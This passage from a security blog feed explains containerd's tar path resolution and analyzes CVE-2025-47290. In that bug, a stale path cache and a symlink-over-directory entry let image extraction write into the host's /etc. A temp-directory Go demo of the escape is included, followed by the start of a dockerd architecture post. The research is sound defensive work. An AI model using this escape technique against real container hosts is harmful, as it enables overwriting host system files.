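<p>The split step can be tried in isolation. The following is a minimal sketch, not the containerd code: <code class="language-plaintext highlighter-rouge">splitEntry</code> and <code class="language-plaintext highlighter-rouge">clampBase</code> are hypothetical helper names, and only the two <code class="language-plaintext highlighter-rouge">filepath</code> calls are taken from the snippet above.</p>

```go
package main

import (
	"fmt"
	"path/filepath"
)

// splitEntry mirrors the first step shown above: split a tar entry name into
// its directory part and its final element.
func splitEntry(name string) (dir, base string) {
	return filepath.Split(name)
}

// clampBase mirrors filepath.Join("/", base): Join cleans its result, so a
// base of ".." collapses to "/" and cannot climb any higher.
func clampBase(base string) string {
	return filepath.Join("/", base)
}

func main() {
	for _, name := range []string{"../../../a", "usr/bin/ls", "a/.."} {
		dir, base := splitEntry(name)
		fmt.Printf("%q: dir=%q base=%q clamped=%q\n", name, dir, base, clampBase(base))
	}
}
```

<p>The entry <code class="language-plaintext highlighter-rouge">"a/.."</code> is the interesting one: its base is <code class="language-plaintext highlighter-rouge">".."</code>, which the inner <code class="language-plaintext highlighter-rouge">filepath.Join("/", base)</code> turns into <code class="language-plaintext highlighter-rouge">"/"</code> before it is appended to the resolved parent.</p>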

<p>So <code class="language-plaintext highlighter-rouge">fs.RootPath()</code> has to make sure the resolved <code class="language-plaintext highlighter-rouge">ppath</code> is inside the root directory — and how does it do that?</p>

<p>We won’t trace the real code here because it’s unnecessary. There are just two points to know about safe path resolution:</p>
<ol>
  <li><strong>Clamp every <code class="language-plaintext highlighter-rouge">".."</code> at the root</strong>: it calls <code class="language-plaintext highlighter-rouge">filepath.Join("/", path)</code>, which cleans the path so that a leading <code class="language-plaintext highlighter-rouge">"/.."</code> collapses to <code class="language-plaintext highlighter-rouge">"/"</code> and cannot climb above the root.</li>
  <li><strong>Manually resolve symlinks</strong>: it calls <code class="language-plaintext highlighter-rouge">lstat</code> to detect a symlink, reads the link target, and re-bounds that target to the root.</li>
</ol>
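
<p>To make the two points concrete, here is a simplified sketch of a scoped resolver. It is an assumption-laden illustration rather than containerd’s <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>: the names <code class="language-plaintext highlighter-rouge">resolveInRoot</code> and <code class="language-plaintext highlighter-rouge">demo</code> are hypothetical, and the symlink limit of 255 is an arbitrary choice.</p>

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolveInRoot is a simplified, hypothetical scoped resolver. It is NOT
// containerd's fs.RootPath; it only illustrates the two points above.
func resolveInRoot(root, unsafePath string) (string, error) {
	// Point 1: Join("/", p) cleans the path, so leading ".." are dropped.
	pending := strings.Split(filepath.Join("/", unsafePath), "/")
	resolved := "/" // symlink-free path, relative to root
	links := 0
	for len(pending) > 0 {
		part := pending[0]
		pending = pending[1:]
		if part == "" {
			continue
		}
		// Join cleans again, so ".." coming from a link target is clamped too.
		next := filepath.Join(resolved, part)
		info, err := os.Lstat(filepath.Join(root, next))
		if errors.Is(err, os.ErrNotExist) {
			resolved = next // nothing on disk yet: keep the component as-is
			continue
		}
		if err != nil {
			return "", err
		}
		if info.Mode().Type() != os.ModeSymlink {
			resolved = next
			continue
		}
		// Point 2: read the link ourselves and re-bound its target to root.
		links++
		if links > 255 {
			return "", errors.New("too many levels of symbolic links")
		}
		target, err := os.Readlink(filepath.Join(root, next))
		if err != nil {
			return "", err
		}
		if filepath.IsAbs(target) {
			resolved = "/" // an absolute target restarts at the root
		}
		pending = append(strings.Split(target, "/"), pending...)
	}
	return filepath.Join(root, resolved), nil
}

// demo resolves two hostile-looking names inside a throwaway root that holds
// a symlink to "/etc", and returns the results relative to that root.
func demo() (dotdot, viaLink string, err error) {
	root, err := os.MkdirTemp("", "rootfs")
	if err != nil {
		return "", "", err
	}
	defer os.RemoveAll(root)
	if err = os.Symlink("/etc", filepath.Join(root, "link")); err != nil {
		return "", "", err
	}
	a, err := resolveInRoot(root, "../../../a")
	if err != nil {
		return "", "", err
	}
	b, err := resolveInRoot(root, "link/passwd")
	if err != nil {
		return "", "", err
	}
	return strings.TrimPrefix(a, root), strings.TrimPrefix(b, root), nil
}

func main() {
	fmt.Println(demo())
}
```

<p>In this sketch, both inputs stay below the root: the <code class="language-plaintext highlighter-rouge">".."</code> chain is clamped, and the absolute link target <code class="language-plaintext highlighter-rouge">/etc</code> is interpreted relative to the root instead of the host.</p>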

<h2 id="4-past-vulnerability">4. Past Vulnerability</h2>

<p>I didn’t find many past vulnerabilities, but CVE-2025-47290 caught my eye: it makes <code class="language-plaintext highlighter-rouge">containerd</code> overwrite files on the host filesystem when pulling an image.</p>

<p>This vulnerability was found by researcher Tõnis Tiigi, and the advisory is <a href="https://github.com/advisories/GHSA-cm76-qm8v-3j95">here</a>.</p>

<p>In the affected version of <code class="language-plaintext highlighter-rouge">containerd</code>, the <code class="language-plaintext highlighter-rouge">cachedRootPath</code> structure is used as a cache for path resolution.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">cachedRootPath</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">root</span>  <span class="kt">string</span>
    <span class="n">cache</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">newCachedRootPath</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">)</span> <span class="o">*</span><span class="n">cachedRootPath</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">cachedRootPath</span><span class="p">{</span>
        <span class="n">root</span><span class="o">:</span>  <span class="n">root</span><span class="p">,</span>
        <span class="n">cache</span><span class="o">:</span> <span class="nb">make</span><span class="p">(</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">),</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">cachedRootPath</span><span class="p">)</span> <span class="n">get</span><span class="p">(</span><span class="n">path</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">hit</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cache</span><span class="p">[</span><span class="n">path</span><span class="p">];</span> <span class="n">ok</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">hit</span><span class="p">,</span> <span class="no">nil</span>
    <span class="p">}</span>
    <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="s">""</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="n">c</span><span class="o">.</span><span class="n">cache</span><span class="p">[</span><span class="n">path</span><span class="p">]</span> <span class="o">=</span> <span class="n">p</span>
    <span class="k">return</span> <span class="n">p</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For example, if <strong>multiple tar entries</strong> are in the same directory, only the first call to <code class="language-plaintext highlighter-rouge">rootPath.get()</code> performs the real path resolution in <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>, and the following entries just read the path from the cache. Since <code class="language-plaintext highlighter-rouge">fs.RootPath(c.root, path)</code> ensures the resolved path is inside the root, this looks safe at first glance.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
<span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">rootPath</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">ppath</span><span class="p">)</span>
</code></pre></div></div>

<p>However, the tar format allows <strong>multiple entries with the same name</strong>, and how they are handled is up to the extractor. Here, <code class="language-plaintext highlighter-rouge">containerd</code> handles them according to the following two rules:</p>
<ol>
  <li>dir-over-dir: <strong>merge</strong>. The existing entry is a directory and the new header is also TypeDir -&gt; keep the directory, just <strong>re-apply metadata</strong>.</li>
  <li>everything else: <strong>remove + replace</strong>. Any other combination (file-over-file, file-over-dir, dir-over-file, symlink, etc.) -&gt; <code class="language-plaintext highlighter-rouge">os.RemoveAll(path)</code> wipes the old entry first.</li>
</ol>
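
<p>The two rules can be sketched as a small pre-write check. This is a hedged illustration, not the actual containerd function: <code class="language-plaintext highlighter-rouge">prepareTarget</code> and <code class="language-plaintext highlighter-rouge">demo</code> are hypothetical names, and the metadata re-application is left to the caller.</p>

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
)

// prepareTarget is a hypothetical helper that applies the two rules to an
// existing path before a new tar entry is written there. It reports whether
// the existing directory was kept (the "merge" case).
func prepareTarget(path string, newIsDir bool) (kept bool, err error) {
	info, err := os.Lstat(path) // Lstat: a symlink to a directory is not a directory
	if errors.Is(err, os.ErrNotExist) {
		return false, nil // nothing to merge or replace
	}
	if err != nil {
		return false, err
	}
	if info.IsDir() && newIsDir {
		return true, nil // dir-over-dir: keep contents, caller re-applies metadata
	}
	return false, os.RemoveAll(path) // everything else: wipe the old entry
}

// demo applies a dir-over-dir entry and then a non-directory entry to the
// same path, and reports whether a child file survived each step.
func demo() (afterDir, afterOther bool, err error) {
	root, err := os.MkdirTemp("", "overwrite")
	if err != nil {
		return false, false, err
	}
	defer os.RemoveAll(root)
	dir := filepath.Join(root, "a")
	child := filepath.Join(dir, "b")
	if err = os.Mkdir(dir, 0o755); err != nil {
		return false, false, err
	}
	if err = os.WriteFile(child, []byte("b"), 0o644); err != nil {
		return false, false, err
	}
	exists := func() bool {
		_, statErr := os.Lstat(child)
		return statErr == nil
	}
	if _, err = prepareTarget(dir, true); err != nil {
		return false, false, err
	}
	afterDir = exists()
	if _, err = prepareTarget(dir, false); err != nil {
		return false, false, err
	}
	afterOther = exists()
	return afterDir, afterOther, nil
}

func main() {
	fmt.Println(demo())
}
```

<p>The second rule is the one that matters for the bug below: a non-directory entry, such as a symlink, silently removes an existing directory and takes its place.</p>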

<p>Suppose we first create a new file <code class="language-plaintext highlighter-rouge">/a/b</code>, which populates the cache entry for <code class="language-plaintext highlighter-rouge">/a</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a" -&gt; "/host/root/a"
</code></pre></div></div>

<p>Later, a symlink-over-dir entry replaces the <code class="language-plaintext highlighter-rouge">/a</code> directory with a symlink pointing to <code class="language-plaintext highlighter-rouge">/etc</code>. Then we create another new file <code class="language-plaintext highlighter-rouge">/a/c</code>. Its parent directory should now be resolved to <code class="language-plaintext highlighter-rouge">/host/root/etc</code> by <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a" -&gt; "/host/root/a"                     # cached
"/a" -&gt; "/host/root/a" --symlink--&gt; "/etc" # actual
</code></pre></div></div>

<p>However, because of the cache, <code class="language-plaintext highlighter-rouge">/a</code> still maps to <code class="language-plaintext highlighter-rouge">/host/root/a</code>, which is now a symlink that the kernel follows to the host’s <code class="language-plaintext highlighter-rouge">/etc</code>, so the file ends up in <code class="language-plaintext highlighter-rouge">/etc/c</code> on the host.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a/c" -&gt; "/host/root/etc/c" # expected
       -&gt; "/host/root/a/c"   # path built from the stale cache
       -&gt; "/etc/c"           # where the write actually lands
</code></pre></div></div>
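
<p>The sequence above can be replayed safely inside a temporary directory. The sketch below is not the containerd code: <code class="language-plaintext highlighter-rouge">resolve</code>, <code class="language-plaintext highlighter-rouge">cachedResolver</code>, and <code class="language-plaintext highlighter-rouge">demo</code> are hypothetical, the resolver only handles a directory directly under the root, and a sibling directory named <code class="language-plaintext highlighter-rouge">host-etc</code> stands in for the host’s <code class="language-plaintext highlighter-rouge">/etc</code>.</p>

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolve is a deliberately tiny resolver for a directory directly under
// root: if it is a symlink, the link target is re-bounded to root.
func resolve(root, dir string) (string, error) {
	p := filepath.Join(root, filepath.Join("/", dir))
	info, err := os.Lstat(p)
	if errors.Is(err, os.ErrNotExist) {
		return p, nil
	}
	if err != nil {
		return "", err
	}
	if info.Mode().Type() != os.ModeSymlink {
		return p, nil
	}
	target, err := os.Readlink(p)
	if err != nil {
		return "", err
	}
	return filepath.Join(root, filepath.Join("/", target)), nil
}

// cachedResolver mimics the shape of cachedRootPath: the first answer wins.
type cachedResolver struct {
	root  string
	cache map[string]string
}

func (c *cachedResolver) get(dir string) (string, error) {
	if hit, ok := c.cache[dir]; ok {
		return hit, nil // never re-checked against the disk
	}
	p, err := resolve(c.root, dir)
	if err != nil {
		return "", err
	}
	c.cache[dir] = p
	return p, nil
}

// demo replays the three entries from the text. It reports whether the cached
// path let the last write escape, and whether a fresh resolve stays in root.
func demo() (escaped, freshInside bool, err error) {
	base, err := os.MkdirTemp("", "stale-cache")
	if err != nil {
		return false, false, err
	}
	defer os.RemoveAll(base)
	root, host := filepath.Join(base, "root"), filepath.Join(base, "host-etc")
	c := &cachedResolver{root: root, cache: map[string]string{}}
	write := func(name string) error { // writes a/<name> through the cache
		dir, err := c.get("a")
		if err != nil {
			return err
		}
		return os.WriteFile(filepath.Join(dir, name), []byte(name), 0o644)
	}
	steps := []func() error{
		func() error { return os.MkdirAll(filepath.Join(root, "a"), 0o755) },
		func() error { return os.Mkdir(host, 0o755) },
		func() error { return write("b") }, // entry 1: caches "a"
		func() error { return os.RemoveAll(filepath.Join(root, "a")) },
		func() error { return os.Symlink(host, filepath.Join(root, "a")) }, // entry 2
		func() error { return write("c") }, // entry 3: stale cache hit
	}
	for _, step := range steps {
		if err = step(); err != nil {
			return false, false, err
		}
	}
	_, statErr := os.Stat(filepath.Join(host, "c"))
	fresh, err := resolve(root, "a")
	if err != nil {
		return false, false, err
	}
	return statErr == nil, strings.HasPrefix(fresh, root+"/"), nil
}

func main() {
	fmt.Println(demo())
}
```

<p>The uncached <code class="language-plaintext highlighter-rouge">resolve()</code> call at the end still returns a path below the root, which shows that the resolver itself is fine and that only the stale cache entry lets the write escape.</p>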

<p>It sounds like a pretty critical vulnerability — why don’t more people know about it?</p>

<p>Because it was introduced on <strong>Mar 8, 2025</strong> (<a href="https://github.com/containerd/containerd/pull/11337/changes">file diff</a>) and later reverted on <strong>May 21, 2025</strong> (<a href="https://github.com/containerd/containerd/commit/cada13298fba85493badb6fecb6ccf80e49673cc">revert commit</a>), which means this bug lived in the source tree for only about two and a half months and affected a single sub-version (2.1.0 -&gt; 2.1.1).</p>

<h2 id="5-summary">5. Summary</h2>

<p>In this post, we’ve covered the pull flow and discussed the attack surfaces. In the next post, we’ll analyze how Docker uses <code class="language-plaintext highlighter-rouge">runc</code> to load a container, and take the NVIDIA toolkit as an example to understand how vendors bridge or customize their implementation within the Docker system.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In the last post, we introduced the relationship between the components in the Docker system, and in this post, we’ll discuss the attack surfaces.]]></summary></entry><entry><title type="html">Docker Internal (1)</title><link href="https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1.html" rel="alternate" type="text/html" title="Docker Internal (1)" /><published>2026-05-27T00:00:00+00:00</published><updated>2026-05-27T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1.html"><![CDATA[<p>For this year’s (2026) Pwn2Own Berlin, I tried to find vulnerabilities in Docker but came up with nothing. This post simply documents my research on Docker’s system implementation, since it is quite interesting.</p>

<p>The attack scenario involves downloading an unknown image or running a malicious image, so I only focus on its architecture and then delve into the code that accesses user-controllable data.</p>

<p>This series is expected to be divided into three parts, covering Docker’s basic architecture, attack surfaces, past vulnerabilities, and the NVIDIA toolkit as a bonus! I hope you enjoy these posts and learn something new 🙂.</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>First, there are a few Docker products that may confuse readers. The most common one is <a href="https://docs.docker.com/engine/install/ubuntu/">Docker Engine</a>, and another is <a href="https://www.docker.com/products/docker-desktop/">Docker Desktop</a>, which is relatively niche but more user-friendly since it provides a GUI and runs containers inside a <strong>lightweight VM</strong> (for example, QEMU-KVM). Here, we are discussing <strong>Docker Engine</strong>, not Docker Desktop.</p>

<p>If you follow the installation steps for Docker Engine on Ubuntu, you’ll notice that <code class="language-plaintext highlighter-rouge">containerd</code> is installed as well!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
                                         ^^^^^^^^^^^^^
</code></pre></div></div>

<p>In fact, the Docker Engine consists of several components: the CLI tool (<code class="language-plaintext highlighter-rouge">docker-cli</code>), the frontend (<code class="language-plaintext highlighter-rouge">dockerd</code>), the backend (<code class="language-plaintext highlighter-rouge">containerd</code>), the container’s shim daemon (<code class="language-plaintext highlighter-rouge">containerd-shim-runc-v2</code>) and loader (<code class="language-plaintext highlighter-rouge">runc</code>). The interaction between the components looks like this:</p>

<p><img src="/assets/image-20260526000000001.png" alt="image-20260526000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>When executing a command like <code class="language-plaintext highlighter-rouge">docker run -it ubuntu /bin/bash</code>, <code class="language-plaintext highlighter-rouge">docker-cli</code> first connects to the Unix socket <code class="language-plaintext highlighter-rouge">docker.sock</code> and sends the request. Then, <code class="language-plaintext highlighter-rouge">dockerd</code> wraps the request in gRPC format and forwards it to <code class="language-plaintext highlighter-rouge">containerd</code> via the Unix socket <code class="language-plaintext highlighter-rouge">containerd.sock</code>. <code class="language-plaintext highlighter-rouge">containerd</code> is responsible for loading the image, invoking <code class="language-plaintext highlighter-rouge">runc</code> to create a container, and managing the container lifecycle. Finally, the container is spawned in an isolated execution environment based on Linux namespaces, capabilities, and cgroups.</p>
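
<p>The first hop, HTTP over a Unix socket, is easy to reproduce without the Docker client library. The following is a minimal sketch under a few assumptions: <code class="language-plaintext highlighter-rouge">newUnixClient</code> and <code class="language-plaintext highlighter-rouge">ping</code> are hypothetical helpers, <code class="language-plaintext highlighter-rouge">/var/run/docker.sock</code> is the usual default socket path and may differ on your system, and the host name in the URL is a placeholder because the dialer ignores it.</p>

```go
package main

import (
	"context"
	"fmt"
	"io"
	"net"
	"net/http"
)

// newUnixClient returns an HTTP client whose connections always go to the
// given Unix socket, whatever host appears in the request URL.
func newUnixClient(socketPath string) *http.Client {
	return &http.Client{
		Transport: &http.Transport{
			DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
				var d net.Dialer
				return d.DialContext(ctx, "unix", socketPath)
			},
		},
	}
}

// ping sends GET /_ping, the Engine API health-check endpoint, over the socket
// and returns the response body.
func ping(socketPath string) (string, error) {
	resp, err := newUnixClient(socketPath).Get("http://docker/_ping")
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return string(body), err
}

func main() {
	// Assumed default path; reading it usually requires root or docker group membership.
	out, err := ping("/var/run/docker.sock")
	fmt.Println(out, err)
}
```

<p>If the daemon is not running or the socket is not readable, <code class="language-plaintext highlighter-rouge">ping()</code> simply returns the dial error.</p>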

<p>As the backend of Docker Engine, or more precisely <strong>the container runtime</strong>, <code class="language-plaintext highlighter-rouge">containerd</code> can also be used by other engines or orchestrators, such as Kubernetes.</p>

<p>By the way, according to the Pwn2Own rules, Docker Engine and <code class="language-plaintext highlighter-rouge">containerd</code> are listed as two separate targets, but since Docker Engine appears to depend on <code class="language-plaintext highlighter-rouge">containerd</code> as its backend and cannot run on its own, I’m not sure what the attack scenarios for each would be.</p>

<p>Anyway, let’s first take a look at how <code class="language-plaintext highlighter-rouge">dockerd</code> handles HTTP requests and sends gRPC requests to <code class="language-plaintext highlighter-rouge">containerd</code>!</p>

<h2 id="2-dockerd">2. dockerd</h2>

<p>The source code for <code class="language-plaintext highlighter-rouge">dockerd</code> can be found in the <a href="https://github.com/moby/moby">moby/moby GitHub repo</a>, while <code class="language-plaintext highlighter-rouge">docker-cli</code> lives in the <a href="https://github.com/docker/cli">docker/cli GitHub repo</a>.</p>

<h3 id="21-register-api-endpoints">2.1. Register API Endpoints</h3>

<p>The entry point of the Docker daemon (<code class="language-plaintext highlighter-rouge">dockerd</code>) is <code class="language-plaintext highlighter-rouge">start()</code> in <code class="language-plaintext highlighter-rouge">daemon/command/daemon.go</code>. <code class="language-plaintext highlighter-rouge">start()</code> creates an HTTP server [1] that supports both the <strong>gRPC protocol</strong> [2] and the <strong>HTTP protocol</strong> [3], since other CLI tools may communicate via gRPC.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/daemon.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">cli</span> <span class="o">*</span><span class="n">daemonCLI</span><span class="p">)</span> <span class="n">start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">httpServer</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">http</span><span class="o">.</span><span class="n">Server</span><span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">p</span> <span class="n">http</span><span class="o">.</span><span class="n">Protocols</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetHTTP1</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetHTTP2</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetUnencryptedHTTP2</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>

    <span class="n">routers</span> <span class="o">:=</span> <span class="n">buildRouters</span><span class="p">(</span><span class="n">routerOptions</span><span class="p">{</span>
        <span class="n">features</span><span class="o">:</span> <span class="n">d</span><span class="o">.</span><span class="n">Features</span><span class="p">,</span>
        <span class="n">daemon</span><span class="o">:</span>   <span class="n">d</span><span class="p">,</span>
        <span class="n">cluster</span><span class="o">:</span>  <span class="n">c</span><span class="p">,</span>
        <span class="n">builder</span><span class="o">:</span>  <span class="n">b</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="n">gs</span> <span class="o">:=</span> <span class="n">newGRPCServer</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span>
    <span class="n">b</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">RegisterGRPC</span><span class="p">(</span><span class="n">gs</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Protocols</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">p</span> <span class="c">// [3]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Handler</span> <span class="o">=</span> <span class="n">newHTTPHandler</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">gs</span><span class="p">,</span> <span class="n">apiServer</span><span class="o">.</span><span class="n">CreateMux</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">routers</span><span class="o">...</span><span class="p">))</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Serve</span><span class="p">(</span><span class="n">ls</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/command/httphandler.go</span>
<span class="k">func</span> <span class="n">newHTTPHandler</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">gs</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">,</span> <span class="n">apiServer</span> <span class="n">http</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">http</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">httpHandler</span><span class="p">{</span>
        <span class="n">ctx</span><span class="o">:</span>        <span class="n">ctx</span><span class="p">,</span>
        <span class="n">grpcServer</span><span class="o">:</span> <span class="n">gs</span><span class="p">,</span>
        <span class="n">apiServer</span><span class="o">:</span>  <span class="n">apiServer</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">httpServer</code> is an <code class="language-plaintext highlighter-rouge">http.Server</code> object from Go’s <code class="language-plaintext highlighter-rouge">net/http</code> package, and the <code class="language-plaintext highlighter-rouge">ServeHTTP()</code> method of its <code class="language-plaintext highlighter-rouge">.Handler</code> field is called whenever a request arrives. It handles requests in two different ways: if the request uses HTTP/2 and the Content-Type in its header starts with <code class="language-plaintext highlighter-rouge">application/grpc</code>, the request is dispatched to the gRPC server [4]; otherwise, it is treated as a REST HTTP request and handled by the API server [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/httphandler.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">h</span> <span class="o">*</span><span class="n">httpHandler</span><span class="p">)</span> <span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">ProtoMajor</span> <span class="o">==</span> <span class="m">2</span> <span class="o">&amp;&amp;</span> <span class="n">strings</span><span class="o">.</span><span class="n">HasPrefix</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"Content-Type"</span><span class="p">),</span> <span class="s">"application/grpc"</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">h</span><span class="o">.</span><span class="n">grpcServer</span><span class="o">.</span><span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">h</span><span class="o">.</span><span class="n">apiServer</span><span class="o">.</span><span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
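
<p>The dispatch rule can be exercised with synthetic requests from <code class="language-plaintext highlighter-rouge">net/http/httptest</code>. This is only a sketch: <code class="language-plaintext highlighter-rouge">dispatcher</code>, <code class="language-plaintext highlighter-rouge">tag</code>, and <code class="language-plaintext highlighter-rouge">route</code> are hypothetical names, and both backends are plain <code class="language-plaintext highlighter-rouge">http.Handler</code> stubs instead of a real gRPC server and API mux.</p>

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// dispatcher is a stand-in for httpHandler; both fields are stub handlers.
type dispatcher struct {
	grpcServer http.Handler
	apiServer  http.Handler
}

// ServeHTTP applies the same condition as the snippet above.
func (d dispatcher) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	if r.ProtoMajor == 2 && strings.HasPrefix(r.Header.Get("Content-Type"), "application/grpc") {
		d.grpcServer.ServeHTTP(w, r)
	} else {
		d.apiServer.ServeHTTP(w, r)
	}
}

// tag returns a handler that answers with its own name.
func tag(name string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
		fmt.Fprint(w, name)
	})
}

// route sends one synthetic request through the dispatcher and reports which
// backend answered.
func route(protoMajor int, contentType string) string {
	d := dispatcher{grpcServer: tag("grpc"), apiServer: tag("api")}
	r := httptest.NewRequest(http.MethodPost, "/containers/create", nil)
	r.ProtoMajor = protoMajor
	r.Header.Set("Content-Type", contentType)
	w := httptest.NewRecorder()
	d.ServeHTTP(w, r)
	return w.Body.String()
}

func main() {
	fmt.Println(route(2, "application/grpc"))
	fmt.Println(route(1, "application/grpc"))
	fmt.Println(route(2, "application/json"))
}
```

<p>Note that both conditions must hold: a request with a gRPC Content-Type over HTTP/1.1 still goes to the REST API handler.</p>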

<p><code class="language-plaintext highlighter-rouge">buildRouters()</code> calls the <code class="language-plaintext highlighter-rouge">.NewRouter()</code> function of several packages to set up routing. Take the <code class="language-plaintext highlighter-rouge">container</code> package [6] as an example: its <code class="language-plaintext highlighter-rouge">initRoutes()</code> [7] function is called internally and defines the endpoints along with their handlers.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/daemon.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/moby/moby/v2/daemon/server/router/container"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

